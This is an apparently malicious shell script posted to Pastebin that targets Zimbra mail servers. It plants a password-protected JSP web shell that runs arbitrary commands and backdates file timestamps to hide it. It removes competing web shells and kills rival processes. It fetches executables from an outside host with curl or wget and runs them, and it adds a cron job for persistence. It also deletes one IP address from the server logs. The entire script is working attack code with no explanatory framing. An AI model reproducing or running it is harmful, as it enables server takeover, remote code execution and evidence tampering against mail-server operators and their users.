SHARE
TWEET

Untitled

a guest Jun 17th, 2019 354 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/sh
  2. echo "whoami"
  3. if [ -f '/opt/zimbra/cbpolicyd/bin/cbpolicyd' ]; then
  4. MON_PROC='/opt/zimbra/cbpolicyd/bin/cbstat'
  5. else
  6. MON_PROC='/opt/zimbra/lib/zmiostat'
  7. fi
  8. BX_FILE='/opt/zimbra/jetty/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp'
  9. touch $BX_FILE -r /opt/zimbra/jetty/webapps/zimbra/js/zimbra/csfe/ZmCsfeResult.js
  10. STATIC_FILE='/opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp'
  11. if [ ! -f $STATIC_FILE ]; then
  12. chmod 777 /opt/zimbra/jetty/webapps/zimbra/public
  13. echo "<%if(\"LVdpVsmayetL6cvL2YToniYg\".equals(request.getParameter(\"ppwd\"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{\"/bin/sh\",\"-c\", request.getParameter(\"pcom\")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print(\"<pre>\");while((a=in.read(b))!=-1){out.print(new String(b, 0, a));}out.print(\"</pre>\");}%>" > $STATIC_FILE
  14. chmod 544 /opt/zimbra/jetty/webapps/zimbra/public
  15. ls -l $STATIC_FILE
  16. fi # -f $STATIC_FILE
  17. touch $STATIC_FILE -r /opt/zimbra/jetty/webapps/zimbra/public/Boot.jsp
  18. touch /opt/zimbra/jetty/webapps/zimbra/public/login.jsp -r /opt/zimbra/jetty/webapps/zimbra/public/Boot.jsp
  19. if [ -f $STATIC_FILE ]; then
  20. chmod 777 /opt/zimbra/jetty/webapps/zimbra/downloads
  21. chmod 777 /opt/zimbra/jetty/webapps/zimbra/public/jsp/infoc.jsp > /dev/null 2>&1
  22. rm  /opt/zimbra/jetty/webapps/zimbra/public/jsp/infoc.jsp -f > /dev/null 2>&1
  23. chmod 777 /opt/zimbra/jetty/webapps/zimbra/public/jsp/BootCore.jsp > /dev/null 2>&1
  24. rm  /opt/zimbra/jetty/webapps/zimbra/public/jsp/BootCore.jsp -f > /dev/null 2>&1
  25. chmod 777 /opt/zimbra/jetty/webapps/zimbra/public/jsp/ShareCore.jsp > /dev/null 2>&1
  26. rm  /opt/zimbra/jetty/webapps/zimbra/public/jsp/ShareCore.jsp -f > /dev/null 2>&1
  27. chmod 777 /opt/zimbra/jetty/webapps/zimbra/public/jsp/ZimbraCore.jsp > /dev/null 2>&1
  28. rm  /opt/zimbra/jetty/webapps/zimbra/public/jsp/ZimbraCore.jsp -f > /dev/null 2>&1
  29. chmod 777 /opt/zimbra/jetty/webapps/zimbra/public/Online.jsp > /dev/null 2>&1
  30. rm  /opt/zimbra/jetty/webapps/zimbra/public/Online.jsp -f > /dev/null 2>&1
  31. chmod -R 777 /opt/zimbra/jetty/webapps/zimbra/public/404.jsp > /dev/null 2>&1
  32. rm  /opt/zimbra/jetty/webapps/zimbra/public/404.jsp -f > /dev/null 2>&1
  33. rm  /opt/zimbra/jetty/webapps/zimbra/downloads/*.jsp -rf > /dev/null 2>&1
  34. find /opt/zimbra/jetty/webapps -name "*.jsp"|xargs grep -ri "exec(" -l | grep -v "service/error/attachment_blocked.jsp" | grep -v "zimbraAdmin/public/jsp/Debug.jsp" | grep -v "portals/example/static.jsp" | grep -v "public/jsp/CryptCore" | grep -v "public/Ajax.jsp" | xargs rm -f
  35. find /opt/zimbra/jetty/webapps -name "*.jsp"|xargs grep -ri "ClassLoader" -l | grep -v "zimbra/csfe/XZimbra.jsp" | grep -v "public/jsp/Alert.jsp" | xargs rm -f
  36. else
  37. echo "!ajax"
  38. fi
  39. rm -rf /opt/zimbra/jetty/webapps/service/error/404.jsp > /dev/null 2>&1
  40. chmod -R 455 /opt/zimbra/jetty/webapps/zimbra/downloads
  41. chmod -R -w /opt/zimbra/data/tmp/upload
  42. ps aux | grep /tmp/.cache | grep -v grep| awk '{print "kill -9 "$2}' | sh
  43. ps aux | grep /bin/bash | grep -v grep| awk '{print "kill -9 "$2}' | sh;rm -rf /tmp/.cache/*
  44. ps aux | grep /tmp/.cache/.kthrotlds | grep -v grep| awk '{print "kill -9 "$2}' | sh
  45. (crontab -l|grep -v "zmstorewatch")|crontab -
  46. (crontab -l|grep -v "tmp/.cache/")|crontab -
  47. (crontab -l|grep -v "tor2web.")|crontab -
  48. (crontab -l|grep -v "wget")|crontab -
  49. (crontab -l|grep -v "curl")|crontab -
  50. (crontab -l|grep -v "zmswatch.sh"|grep -v "zmlogswatch")|crontab -
  51. AGENT_FILE='/opt/zimbra/log/zmswatch'
  52. STORE_FILE="/opt/zimbra/lib/zmstorewatch"
  53. WATCH_FILE="/opt/zimbra/lib/zmmailboxdwatch"
  54. if [ -f $STORE_FILE ]; then
  55. file1=$WATCH_FILE
  56. else
  57. file1=$AGENT_FILE
  58. fi
  59. ps aux | grep "/tmp/s.sh" | awk '{print "kill -9 "$2}' | sh
  60. ps aux | grep "/tmp/l.sh" | awk '{print "kill -9 "$2}' | sh
  61. ps auxf | grep -v grep | grep "zmcat" | awk '{print $2}' | xargs kill -9
  62. pkill -9 zmcat
  63. ps auxf | grep -v grep | grep 'zmmailboxdwatch' | awk '{print $2}' | xargs kill -9
  64. pkill -9 zmmailboxdwatch
  65. chmod 777 /opt/zimbra/lib/zmmailboxdwatch
  66. rm -f /opt/zimbra/lib/zmmailboxdwatch > /dev/null 2>&1
  67. ps auxf | grep -v grep | grep 'zmstorewatch' | awk '{print $2}' | xargs kill -9
  68. pkill -9 zmstorewatch
  69. chmod 777 /opt/zimbra/lib/zmstorewatch
  70. rm -f /opt/zimbra/lib/zmstorewatch > /dev/null 2>&1
  71. ps aux | grep -v zmswatch | awk '{if($3>50.0) print "kill -9 "$2}' | sh
  72. rm -f /tmp/.cache/.ntp > /dev/null 2>&1
  73. rm -f /tmp/*.sh > /dev/null 2>&1
  74. rm -f /tmp/zmcat > /dev/null 2>&1
  75. rm -f /opt/zimbra/conf/zmsstorewatch.cnf > /dev/null 2>&1
  76. rm -f /opt/zimbra/conf/zmsstore.cnf > /dev/null 2>&1
  77. U=https://wordpress.ulimit-n.com/wp-updates/gKLjD8qd/wl_41mx.zip
  78. if ps auxf | grep -v grep | grep "$AGENT_FILE" > /dev/null; then # running
  79. echo "zmswatch_running" # running
  80. else # running
  81. if [ -f $AGENT_FILE ]; then
  82. filesize=`ls -l $AGENT_FILE | awk '{ print $5}'`
  83. if  [ $filesize -ne 999112 ];then
  84. rm -rf $AGENT_FILE
  85. fi
  86. fi
  87. if [ ! -f $AGENT_FILE ]; then
  88. if command -v curl > /dev/null 2>&1; then
  89. echo 'curl'
  90. curl -k $U -o $AGENT_FILE
  91. elif command -v wget > /dev/null 2>&1; then
  92. echo 'wget'
  93. wget --no-check-certificate $U -O $AGENT_FILE
  94. else
  95. wget --no-check-certificate $U -O $AGENT_FILE
  96. fi
  97. fi # -f AGENT_FILE
  98. if [ ! -x $AGENT_FILE ]; then
  99. echo 'chmod'
  100. chmod +x $AGENT_FILE
  101. fi
  102. nohup $AGENT_FILE > /dev/null 2>&1 &
  103. if ps auxf | grep -v grep | grep "$AGENT_FILE" > /dev/null; then
  104. echo "zmswatch_nohup"
  105. else
  106. echo "zmswatch_nonstart"
  107. fi
  108. fi # running
  109. U2=https://wordpress.ulimit-n.com/wp-updates/gKLjD8qd/watch.zip
  110. if [ ! -f $MON_PROC ]; then
  111. if command -v curl > /dev/null 2>&1; then
  112. curl -k $U2 -o $MON_PROC
  113. elif command -v wget > /dev/null 2>&1; then
  114. wget --no-check-certificate $U2 -O $MON_PROC
  115. else
  116. wget --no-check-certificate $U2 -O $MON_PROC
  117. fi
  118. fi # -f AGENT_FILE
  119. if [ ! -x $MON_PROC ]; then
  120. chmod +x $MON_PROC
  121. fi
  122. if [ ! -f $MON_PROC ]; then
  123. echo "$MON_PROC not exist!"
  124. else
  125. ls -l $MON_PROC
  126. fi
  127. ps -ef | grep $MON_PROC | grep -v grep
  128. if [ $? -ne 0 ]; then
  129. nohup $MON_PROC > /dev/null 2>&1 &
  130. if ps auxf | grep -v grep | grep -v "$MON_PROC" > /dev/null; then
  131. echo "zmlogswatch_nohup"
  132. else
  133. echo "zmlogswatch_nonstart"
  134. fi
  135. else
  136. echo "zmlogswatch_running"
  137. fi
  138. SH_FILE='/opt/zimbra/log/zmswatcher'
  139. echo "#!/bin/sh" >$SH_FILE
  140. echo "if ps auxf | grep -v grep | grep \"$AGENT_FILE\" > /dev/null; then" >>$SH_FILE #error
  141. echo "  echo \"$AGENT_FILE running\"" >>$SH_FILE
  142. echo "else" >>$SH_FILE
  143. echo "  echo \"$AGENT_FILE nohup\"" >>$SH_FILE
  144. echo "  nohup $AGENT_FILE > /dev/null 2>&1 &" >>$SH_FILE
  145. echo "fi" >>$SH_FILE
  146. if [ -f $SH_FILE ]; then
  147. chmod +x $SH_FILE
  148. (crontab -l | grep -v "$SH_FILE";printf "*/30 * * * * $SH_FILE\n") | crontab -
  149. fi
  150.  
  151.  
  152. sed -i '/111\.165\.4\.177/d' /opt/zimbra/log/*_log.2019-06-*
  153. sed -i '/111\.165\.4\.177/d' /opt/zimbra/log/nginx.access.log
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top